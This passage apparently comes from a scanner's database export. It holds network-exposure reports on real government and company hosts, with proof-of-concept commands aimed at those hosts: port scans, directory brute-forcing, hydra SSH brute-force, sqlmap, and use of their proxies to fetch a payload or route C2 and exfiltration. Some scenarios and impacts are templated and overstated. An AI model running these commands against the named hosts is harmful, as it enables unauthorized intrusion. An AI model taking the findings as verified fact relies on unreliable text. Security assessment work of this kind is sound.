simultaneously on the same domain, there is a heightened chance of inconsistent security postures across different endpoints. Each exposed service must undergo independent vulnerability assessments to ensure comprehensive coverage.\n\n**Attack Scenario (Proof of Concept)** \n1. Access the endpoint:\n ```bash\n curl http://ep.gov.pk:8008/status\n ```\n2. Look for differences in headers or content between ports 80 and 8008:\n ```bash\n diff <(curl -I http://ep.gov.pk/) <(curl -I http://ep.gov.pk:8008/)\n ```\n3. Attempt brute-force login or exploit outdated components unique to this instance.\n\n**Business Impact** \nMultiple HTTP entry points complicate patch management and monitoring efforts. Inconsistent deployment practices increase the probability of overlooked vulnerabilities being exploited, leading to breaches that originate from seemingly innocuous auxiliary services.\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nPort 8015/tcp on `ep.gov.pk` functions as an HTTP proxy powered by Fortinet’s FortiGuard Web Filtering technology. Proxies of this nature are designed to filter malicious URLs, enforce acceptable usage policies, and provide centralized logging of internet activity.\n\nHowever, exposing such infrastructure publicly without adequate restrictions allows adversaries to route malicious traffic through trusted domains, evade reputation-based blocking lists, or conduct reconnaissance under the guise of legitimate organizational traffic.\n\n**Attack Scenario (Proof of Concept)** \n1. Verify proxy functionality:\n ```bash\n curl --proxy http://ep.gov.pk:8015 http://example.com\n ```\n2. Abuse proxy to mask origin of malicious requests:\n ```bash\n curl --proxy http://ep.gov.pk:8015 http://malicious-site.net/payload.exe > payload.exe\n ```\n3. Perform stealthy port scans or tunneling operations through the proxy.\n\n**Business Impact** \nPublicly accessible filtering proxies pose serious reputational and operational threats. They can be weaponized to launch attacks attributed to the hosting organization, violate regulatory requirements around network egress control, and consume bandwidth unnecessarily.\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nSimilar to port 8015, port 8020/tcp on `ep.gov.pk` operates as an HTTP proxy utilizing Fortinet’s FortiGuard Web Filtering engine. Multiple proxy ports suggest either redundancy, load balancing, or distinct policy zones applied to various segments of the network.\n\nUnrestricted access to these proxies undermines the intended benefits of centralized filtering by allowing unrestricted outbound connectivity masked behind corporate infrastructure.\n\n**Attack Scenario (Proof of Concept)** \n1. Confirm dual proxy availability:\n ```bash\n curl --proxy http://ep.gov.pk:8020 http://ifconfig.me/ip\n ```\n2. Compare filtering behaviors:\n ```bash\n curl --proxy http://ep.gov.pk:8015 http://blocked-site.org && \\\n curl --proxy http://ep.gov.pk:8020 http://blocked-site.org\n ```\n3. Route C2 traffic or exfiltrate data via one of the proxies.\n\n**Business Impact** \nAllowing unrestricted proxy access erodes the effectiveness of web filtering strategies and increases the organization’s liability in case of misuse. Regulatory bodies may penalize entities whose networks facilitate illicit activities, regardless of intent.","summary":{"total":10}},"summary":{"total":10}},{"_id":{"$oid":"6a1598c4dbe1aba6b35150eb"},"created_at":{"$date":"2026-05-26T12:57:40.712Z"},"url":"https://www.dahd.gov.in/","tool":"generate_network_exposure_report","result":{"url":"https://www.dahd.gov.in/","category":"network_exposure","timestamp":"2026-05-26T12:57:40.705170+00:00","report":"### Open Port 8020/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description** \nPort 8020/TCP is open on the host at IP address `164.100.85.110`. This port is commonly associated with HTTP proxy services or custom web applications. While not inherently insecure, exposing such ports without proper access controls increases the attack surface of the system by providing additional entry points for reconnaissance and exploitation.\n\nAn attacker can use standard tools like Nmap or masscan to detect open ports across large IP ranges. Once identified, further enumeration may reveal running services that could be misconfigured or vulnerable.\n\n**Attack Scenario (Proof of Concept)** \n1. An attacker performs a SYN scan using Nmap:\n ```bash\n nmap -p 8020 164.100.85.110\n ```\n2. The response confirms the port is open.\n3. Using curl or netcat, they attempt to connect to determine if an HTTP-based service is listening:\n ```bash\n curl http://164.100.85.110:8020/\n ```\n4. If successful, they proceed with fingerprinting the server software and probing for known vulnerabilities or directory traversal issues.\n\n**Business Impact** \nExposing unnecessary services increases risk exposure and provides attackers with more potential vectors for compromise. Even if this port does not directly lead to exploitation, it contributes to the overall visibility of infrastructure components which may otherwise remain hidden from public view.\n\n---\n\n### Open Port 443/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description** \nPort 443/TCP is open on the host at IP address `164.100.85.110`, indicating that HTTPS traffic is accepted. This is expected behavior for secure web communication but requires continuous monitoring and patch management due to its role in handling sensitive data transmission.\n\nIf improperly configured, TLS endpoints can expose weak cipher suites, expired certificates, or outdated protocols such as SSLv3 or TLS 1.0, all of which pose significant risks.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker scans the target:\n ```bash\n nmap --script ssl-enum-ciphers -p 443 164.100.85.110\n ```\n2. Output reveals support for deprecated TLS versions.\n3. They exploit protocol downgrade attacks or leverage known weaknesses in older ciphers to intercept encrypted communications.\n\n**Business Impact** \nA compromised TLS endpoint undermines user trust and exposes confidential information during transit. Regulatory compliance frameworks such as PCI-DSS mandate strong encryption standards; failure to maintain them can result in legal penalties and reputational harm.\n\n---\n\n### Open Port 80/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description** \nPort 80/TCP is open on the host at IP address `164.100.85.110`, suggesting that unencrypted HTTP traffic is being served. While often used for redirecting users to HTTPS, leaving HTTP accessible without safeguards introduces plaintext interception opportunities.\n\nAttackers typically scan for common ports including 80 to identify web-accessible interfaces. Misconfigurations here—such as lack of redirects or presence of administrative panels—can facilitate unauthorized access.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker runs:\n ```bash\n curl http://164.100.85.110/\n ```\n2. Response returns content over plain HTTP instead of redirecting to HTTPS.\n3. They perform MITM attacks or inject malicious scripts into responses when transmitted over insecure networks.\n\n**Business Impact** \nUnsecured HTTP services increase susceptibility to session hijacking, credential theft, and man-in-the-middle attacks. Organizations face liability under privacy laws like GDPR if personal data is intercepted via non-TLS connections.\n\n---\n\n### Open Port 8008/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description** \nPort 8008/TCP is open on the host at IP address `164.100.85.110`. This port is occasionally used for alternative HTTP services or internal application proxies. Its exposure should be carefully evaluated based on intended usage.\n\nSuch ports are frequently overlooked in firewall rulesets, potentially allowing unintended access to backend systems or development environments exposed to the internet.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker discovers the port via scanning:\n ```bash\n nmap -sV -p 8008 164.100.85.110\n ```\n2. Service banner indicates it's serving HTTP traffic.\n3. They enumerate directories using tools like dirb or gobuster:\n ```bash\n gobuster dir -u http://164.100.85.110:8008/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt\n ```\n\n**Business Impact** \nImproperly secured alternate HTTP ports can provide attackers with access to debug interfaces, staging sites, or legacy applications containing sensitive configuration files or credentials.\n\n---\n\n### Open Port 8015/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description** \nPort 8015/TCP is open on the host at IP address `164.100.85.110`. It is sometimes used for proxy services or specialized web applications. Exposed ports outside standard ranges require justification and strict access control policies.\n\nAttackers often probe lesser-known ports to discover hidden or misconfigured services that might have fewer protections than primary web servers.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker identifies the port via scan:\n ```bash\n nmap -p 8015 164.100.85.110\n ```\n2. Connects using browser or CLI tool:\n ```bash\n curl http://164.100.85.110:8015/\n ```\n3. Discovers an unprotected admin interface or test environment.\n\n**Business Impact** \nUnauthorized access through obscure ports can bypass perimeter defenses and allow lateral movement within enterprise networks, increasing the likelihood of deeper breaches.\n\n---\n\n### Open Port 80/tcp (HTTP) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description** \nThe domain `www.dahd.gov.in` has port 80 open, accepting HTTP requests. Although many modern websites automatically redirect HTTP to HTTPS, maintaining an active HTTP listener without appropriate redirection logic leaves room for cleartext interception and downgrade attacks.\n\nThis configuration also allows search engines and crawlers to index insecure pages unless explicitly blocked via robots.txt or meta tags.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker visits:\n ```bash\n curl http://www.dahd.gov.in/\n ```\n2. Receives full HTML page rather than a redirect.\n3. Performs passive eavesdropping on public Wi-Fi to capture login forms or cookies sent over HTTP.\n\n**Business Impact** \nFailure to enforce HTTPS leads to increased vulnerability to surveillance and tampering. Government domains especially must ensure end-to-end encryption to protect citizen interactions and uphold digital sovereignty principles.\n\n---\n\n### Open Port 443/tcp (HTTPS – GoIServer) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description** \nPort 443 on `www.dahd.gov.in` serves HTTPS traffic using the \"GoIServer\" product. While functional, identifying specific server technologies enables targeted exploits against known vulnerabilities tied to those implementations.\n\nAdditionally, improper TLS configurations or missing certificate validation checks can weaken cryptographic protections even when using valid certificates.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker uses WhatWeb or similar tool:\n ```bash\n whatweb https://www.dahd.gov.in\n ```\n2. Identifies server type as GoIServer.\n3. Searches CVE databases for relevant exploits targeting that software version.\n\n**Business Impact** \nRevealing exact server details facilitates focused attacks tailored to exploit vendor-specific flaws. In government contexts, this transparency can undermine confidence in digital infrastructure resilience.\n\n---\n\n### Open Port 8008/tcp (HTTP) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description** \nPort 8008 on `www.dahd.gov.in` accepts HTTP traffic. As with other non-standard ports, this represents an expanded attack surface requiring explicit justification and hardening measures.\n\nSuch ports may serve internal APIs, testing environments, or legacy applications that were never meant for public consumption but inadvertently became accessible.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker probes the port:\n ```bash\n curl http://www.dahd.gov.in:8008/\n ```\n2. Gets back API documentation or debug output.\n3. Exploits undocumented endpoints or authentication bypasses present in development builds.\n\n**Business Impact** \nExposing auxiliary HTTP services increases chances of discovering exploitable flaws in less-maintained subsystems, leading to unauthorized data access or denial-of-service conditions.\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy – FortiGuard Web Filtering) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description** \nPort 8015 on `www.dahd.gov.in` operates as an HTTP proxy identified as “FortiGuard Web Filtering.” Proxies are critical intermediaries that filter and route traffic, making their exposure highly sensitive.\n\nMisconfigured proxies can act as open relays, enabling attackers to mask their identities while launching malicious activities or accessing restricted resources indirectly.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker tests proxy functionality:\n ```bash\n curl --proxy http://www.dahd.gov.in:8015 http://example.com\n ```\n2. Confirms successful relay capability.\n3. Uses proxy to anonymize subsequent attacks or bypass geolocation restrictions.\n\n**Business Impact** \nCompromised or misused proxies can cause severe reputational damage and violate international cybersecurity norms. Additionally, they may enable abuse originating from organizational IP addresses, triggering blacklisting actions.\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy – FortiGuard Web Filtering) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description** \nPort 8020 on `www.dahd.gov.in` functions as another instance of an HTTP proxy labeled as “FortiGuard Web Filtering.” Multiple proxy instances suggest layered filtering architecture, yet each adds complexity and potential misconfiguration risks.\n\nIf either proxy lacks sufficient access controls, adversaries can route traffic through them to evade detection or gain indirect access to internal systems.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker verifies proxy operation:\n ```bash\n curl --proxy http://www.dahd.gov.in:8020 http://internal-api.local\n ```\n2. Successfully accesses internal resource via proxy tunneling.\n3. Conducts reconnaissance or initiates lateral movement inside the network.\n\n**Business Impact** \nProxy misuse can facilitate advanced persistent threat (APT) campaigns and insider threats. Government agencies relying on such infrastructure must rigorously audit and restrict proxy access to prevent covert exfiltration or infiltration attempts.\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description** \nThe domain `www.dahd.gov.in` appears on the DNS-based spam blacklist maintained by `list.quorum.to`. Being listed suggests that the domain or associated IP address has been flagged for sending unsolicited email or exhibiting behaviors consistent with spam operations.\n\nAlthough not directly exploitable, blacklisting affects deliverability of legitimate emails and damages institutional credibility online.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker queries DNSBL database:\n ```bash\n dig +short TXT 110.85.100.164.list.quorum.to\n ```\n2. Returns positive match confirming listing.\n3. Phishing campaigns spoofing the domain will likely fail delivery due to reputation issues.\n\n**Business Impact** \nEmail blacklisting hampers official correspondence and reduces effectiveness of outreach programs. Public institutions depend heavily on reliable communication channels; degraded sender reputation can impede mission-critical messaging efforts.","summary":{"total":11}},"summary":{"total":11}},{"_id":{"$oid":"6a1f25adac393fe0e5b4059a"},"created_at":{"$date":"2026-06-02T18:49:17.850Z"},"url":"https://onmark.co.in/nmu/","tool":"generate_network_exposure_report","result":{"url":"https://onmark.co.in/nmu/","category":"network_exposure","timestamp":"2026-06-02T18:49:17.843570+00:00","report":"### Open Port 8015/tcp on 13.126.254.44\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 13.126.254.44 |\n\n**Description** \nPort 8015/tcp is open on the IP address `13.126.254.44`. This port is commonly associated with HTTP proxy services or custom web applications. The exposure of such ports without proper access controls or authentication mechanisms can provide attackers with an entry point into internal systems or expose sensitive backend functionality.\n\nAn attacker typically identifies open ports using SYN scans or full TCP connection scans via tools like Nmap or Masscan. Once identified, further enumeration (e.g., banner grabbing, service detection) helps determine the nature of the service running on the port.\n\n**Attack Scenario (Proof of Concept)** \n1. An attacker performs a port scan against `13.126.254.44` and discovers that port 8015 is open.\n2. Using `curl`, they attempt to connect to the endpoint:\n ```bash\n curl -v http://13.126.254.44:8015/\n ```\n3. If the response indicates a web-based interface or API, the attacker may proceed to fingerprint the application for vulnerabilities such as directory traversal, SSRF, or misconfigured access control.\n4. In case of a proxy configuration, the attacker might try sending requests through it to bypass network restrictions or pivot internally.\n\n**Business Impact** \nWhile this finding alone does not represent a direct vulnerability, exposing non-standard HTTP ports increases the attack surface. It allows potential reconnaissance by adversaries who may exploit weakly protected interfaces or leverage unintended functionality for lateral movement or privilege escalation within the infrastructure.\n\n---\n\n### Open Port 8008/tcp on 13.126.254.44\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 13.126.254.44 |\n\n**Description** \nThe presence of an open port at 8008/tcp suggests a possible alternative HTTP server or reverse proxy configuration. Commonly used in development environments or containerized deployments, this port often hosts administrative panels, APIs, or debug endpoints which are intended for internal use only.\n\nIf improperly secured, these services can be accessed externally, leading to unauthorized access or information disclosure. Attackers routinely scan for known default ports to identify misconfigurations or legacy services left exposed to the internet.\n\n**Attack Scenario (Proof of Concept)** \n1. A scanner detects port 8008 open on `13.126.254.44`.\n2. The attacker sends an HTTP GET request:\n ```bash\n curl -v http://13.126.254.44:8008/\n ```\n3. Based on the returned headers or content, the attacker determines whether the service is vulnerable to common issues such as:\n - Directory listing enabled\n - Debug mode active\n - Authentication bypass due to improper routing rules\n4. Further exploitation depends on identifying weaknesses in the hosted application logic or leveraging the service as a stepping stone for deeper infiltration.\n\n**Business Impact** \nExposing auxiliary HTTP services increases risk by providing additional vectors for compromise. Even if the primary service remains secure, an overlooked secondary service could serve as a backdoor or leak sensitive system metadata, undermining overall security posture.\n\n---\n\n### Open Port 8020/tcp on 13.126.254.44\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 13.126.254.44 |\n\n**Description** \nPort 8020/tcp being open implies another instance of a potentially unsecured HTTP-based service. Such ports are sometimes used by enterprise software suites, integration platforms, or monitoring dashboards. Without adequate protection, these services can become targets for exploitation or abuse.\n\nAttackers frequently enumerate all available ports to map out the full scope of accessible services. Any deviation from standard HTTP(S) ports warrants attention, especially when no clear business justification exists for their public availability.\n\n**Attack Scenario (Proof of Concept)** \n1. Reconnaissance reveals port 8020 is listening on `13.126.254.44`.\n2. Initial probing with `nc` or `curl` yields basic connectivity:\n ```bash\n nc -zv 13.126.254.44 8020\n ```\n3. Subsequent attempts to retrieve index pages or API documentation reveal internal paths or configurations:\n ```bash\n curl http://13.126.254.44:8020/api/status\n ```\n4. Depending on the service type, attackers may attempt brute-force login, inject malicious payloads, or exploit outdated components running behind the port.\n\n**Business Impact** \nUncontrolled exposure of auxiliary HTTP ports poses risks including unauthorized access to management consoles, leakage of operational intelligence, and facilitation of advanced persistent threat activities. Organizations should audit and restrict unnecessary service exposure to minimize potential footholds for intruders.\n\n---\n\n### Open Port 443/tcp Detected on 13.126.254.44\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description** \nPort 443/tcp is the standard port for HTTPS traffic and is expected to be open for publicly accessible websites. However, its presence still contributes to the overall network footprint and requires continuous validation regarding TLS configuration, certificate validity, and supported cipher suites.\n\nThis port was observed during scanning directed toward `https://onmark.co.in/nmu/`, indicating that the host serves encrypted web content over SSL/TLS. Misconfigurations here—such as expired certificates, weak encryption protocols, or insecure renegotiation settings—could undermine user trust and enable man-in-the-middle attacks.\n\n**Attack Scenario (Proof of Concept)** \n1. Scanning confirms port 443 is open on `13.126.254.44`.\n2. An attacker uses `openssl s_client` to inspect the TLS handshake:\n ```bash\n openssl s_client -connect 13.126.254.44:443 -servername onmark.co.in\n ```\n3. They analyze the output for deprecated protocols (SSLv3, TLS 1.0), weak ciphers, or missing security extensions (HSTS, OCSP stapling).\n4. If vulnerabilities exist, the attacker may perform downgrade attacks or intercept communications under certain conditions.\n\n**Business Impact** \nAlthough essential for secure communication, improper handling of HTTPS services undermines confidentiality and integrity guarantees. Poor TLS hygiene can lead to browser warnings, reduced customer confidence, compliance violations, and susceptibility to eavesdropping or session hijacking.\n\n---\n\n### Open SSH Service on Port 24/tcp – OpenSSH 7.6p1 Ubuntu 4ubuntu0.7\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description** \nSSH service is exposed on port 24/tcp instead of the default port 22/tcp. Running SSH on a non-standard port is sometimes employed as a rudimentary defense mechanism to reduce automated bot traffic; however, it provides minimal actual security benefit since port scanning easily reveals the service's location.\n\nVersion `OpenSSH 7.6p1` has known vulnerabilities depending on patch level and distribution-specific modifications. While version 7.6p1 itself is relatively old, the specific build (`Ubuntu 4ubuntu0.7`) includes patches up to a certain date but may still lack fixes for more recent CVEs unless explicitly updated.\n\n**Attack Scenario (Proof of Concept)** \n1. Enumeration shows SSH service running on port 24/tcp of `onmark.co.in`.\n2. Attacker initiates a brute-force attack using Hydra:\n ```bash\n hydra -l admin -P passwords.txt ssh://onmark.co.in:24\n ```\n3. Alternatively, they check for known exploits related to OpenSSH versions prior to 8.x:\n ```bash\n searchsploit openssh 7.6\n ```\n4. Successful authentication grants shell access, enabling further compromise of the underlying system.\n\n**Business Impact** \nSSH exposure—even on a non-default port—represents a critical remote access vector. Compromise of SSH credentials or exploitation of protocol-level flaws can result in complete system takeover, data exfiltration, persistence establishment, and lateral movement across the network.\n\n---\n\n### Open HTTP Service on Port 443/tcp – Apache httpd\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description** \nStandard HTTPS service is provided by Apache httpd on port 443/tcp for domain `onmark.co.in`. As one of the most widely deployed web servers globally, Apache installations require careful tuning and regular updates to mitigate risks stemming from misconfiguration or outdated modules.\n\nDespite serving encrypted traffic, the server’s configuration—including virtual hosts, allowed methods, module usage, and error page disclosures—can inadvertently expose internal details or facilitate abuse if not properly hardened.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker connects to `https://onmark.co.in` and inspects HTTP headers:\n ```bash\n curl -I https://onmark.co.in\n ```\n2. Observing verbose server identification strings (e.g., `Server: Apache/2.4.x`), they look up associated vulnerabilities:\n ```bash\n searchsploit apache 2.4\n ```\n3. They test for dangerous HTTP methods:\n ```bash\n curl -X TRACE https://onmark.co.in\n ```\n4. If TRACE is enabled, Cross-Site Tracing (XST) becomes possible, allowing theft of cookies via XSS vectors.\n\n**Business Impact** \nImproperly configured web servers increase organizational risk by revealing stack fingerprints, permitting unsafe operations, or hosting vulnerable third-party modules. These factors collectively contribute to higher chances of successful web-based attacks targeting both clients and backend infrastructure.\n\n---\n\n### Open HTTP Service on Port 8008/tcp\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description** \nA secondary HTTP listener operates on port 8008/tcp for `onmark.co.in`. Non-standard HTTP ports often indicate development/test environments, reverse proxies, or microservices architectures. When unintentionally exposed to the public internet, these services may lack the same degree of hardening applied to mainline production sites.\n\nSuch services frequently omit logging, rate limiting, or authentication layers, making them attractive targets for initial reconnaissance and exploitation.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker identifies open port 8008 via scan:\n ```bash\n nmap -p 8008 onmark.co.in\n ```\n2. They probe for directory listings or hidden resources:\n ```bash\n dirb http://onmark.co.in:8008/\n ```\n3. Upon discovering unprotected administrative endpoints or debug features, they attempt injection attacks or credential harvesting:\n ```bash\n sqlmap -u \"http://onmark.co.in:8008/admin/login\" --batch\n ```\n\n**Business Impact** \nSecondary HTTP services pose significant threats due to relaxed oversight and inconsistent deployment practices. Their discovery enables attackers to gain early-stage access, extract internal artifacts, or manipulate backend processes before engaging with core assets.\n\n---\n\n### Open HTTP Proxy Service on Port 8015/tcp – FortiGuard Web Filtering\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description** \nPort 8015/tcp runs an HTTP proxy identified as FortiGuard Web Filtering—an enterprise-grade filtering solution designed to enforce web access policies. Exposing such a service externally raises concerns about bypassing local filtering rules, unauthorized proxy chaining, or misuse for anonymizing malicious traffic.\n\nMisconfigured proxies can allow unrestricted outbound connections, effectively turning the organization’s infrastructure into an open relay for external actors.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker confirms proxy operation:\n ```bash\n curl --proxy http://onmark.co.in:8015 http://example.com\n ```\n2. If successful, they route arbitrary traffic through the proxy to obfuscate origin:\n ```bash\n curl --proxy http://onmark.co.in:8015 https://target-site.com\n ```\n3. Advanced usage involves tunneling other protocols or conducting blind SSRF-style attacks against internal services reachable from the proxy host.\n\n**Business Impact** \nPublicly accessible HTTP proxies introduce substantial abuse potential, including facilitating phishing campaigns, malware propagation, and evasion of corporate firewalls. Additionally, reputation damage occurs when blacklists flag the organization’s IP addresses for proxy misuse.\n\n---\n\n### Open HTTP Proxy Service on Port 8020/tcp – FortiGuard Web Filtering\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description** \nAnother FortiGuard Web Filtering proxy instance listens on port 8020/tcp for `onmark.co.in`. Similar to port 8015, this setup introduces similar risks around unauthorized proxy utilization and circumvention of policy enforcement.\n\nMultiple proxy instances suggest either redundancy or segmentation strategies, neither of which justify public accessibility without strict access controls and logging mechanisms.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker verifies proxy functionality:\n ```bash\n curl --proxy http://onmark.co.in:8020 http://ifconfig.me\n ```\n2. They utilize the proxy to mask their identity while performing reconnaissance or launching attacks:\n ```bash\n nikto -h http://internal-service.local -useproxy http://onmark.co.in:8020\n ```\n3. Should internal services be reachable, the attacker gains indirect access to otherwise isolated systems.\n\n**Business Impact** \nDual proxy exposure amplifies the likelihood of abuse and complicates incident attribution. Organizations face elevated exposure to legal liability, regulatory scrutiny, and reputational harm if their infrastructure facilitates illicit activity routed through these endpoints.","summary":{"total":9}},"summary":{"total":9}},{"_id":{"$oid":"6a1f34fea838d48738358ced"},"created_at":{"$date":"2026-06-02T19:54:38.274Z"},"url":"https://www.cert-in.org.in/","tool":"generate_network_exposure_report","result":{"url":"https://www.cert-in.org.in/","category":"network_exposure","timestamp":"2026-06-02T19:54:38.267613+00:00","report":"### Open Port 8015/tcp on 14.139.54.229\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 14.139.54.229 |\n\n**Description** \nPort 8015/tcp is open on the host at IP address `14.139.54.229`. This port typically serves as a non-standard HTTP proxy or application-specific communication endpoint. The exposure of such ports without proper access controls can lead to unauthorized access, information disclosure, or serve as an entry point for lateral movement within the internal network if misconfigured.\n\nAn attacker may identify this port using standard reconnaissance tools like Nmap or Masscan during initial enumeration phases.\n\n**Attack Scenario (Proof of Concept)** \n1. An attacker performs a SYN scan targeting `14.139.54.229`:\n ```bash\n nmap -p 8015 14.139.54.229\n ```\n2. Upon discovering that port 8015 is open, they attempt to connect via browser or curl:\n ```bash\n curl http://14.139.54.229:8015/\n ```\n3. If the service responds with content or headers indicating it's acting as a proxy or exposing internal resources, further probing could reveal sensitive endpoints or allow tunneling into internal systems.\n\n**Business Impact** \nExposing arbitrary TCP ports increases the attack surface unnecessarily. While not inherently exploitable, unmanaged services running on these ports often lack monitoring and hardening practices, potentially leading to compromise if vulnerabilities exist in the underlying software.\n\n---\n\n### Open Port 8020/tcp on 14.139.54.229\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 14.139.54.229 |\n\n**Description** \nPort 8020/tcp is open on the system located at `14.139.54.229`. Similar to other high-numbered ports, this may indicate a custom web server, reverse proxy, API gateway, or middleware component used internally. Without authentication or encryption mechanisms, such services pose risks including data leakage or abuse by malicious actors.\n\nAttackers commonly use automated scanners to detect exposed services across large IP ranges.\n\n**Attack Scenario (Proof of Concept)** \n1. A scanner identifies port 8020 as open:\n ```bash\n masscan -p8020 14.139.54.229\n ```\n2. The attacker connects directly:\n ```bash\n nc 14.139.54.229 8020\n GET / HTTP/1.1\n Host: 14.139.54.229\n ```\n3. Depending on response behavior, the attacker might exploit weak configurations or outdated versions of backend applications listening on this port.\n\n**Business Impact** \nUnintended exposure of internal services can result in unauthorized access to administrative interfaces, configuration 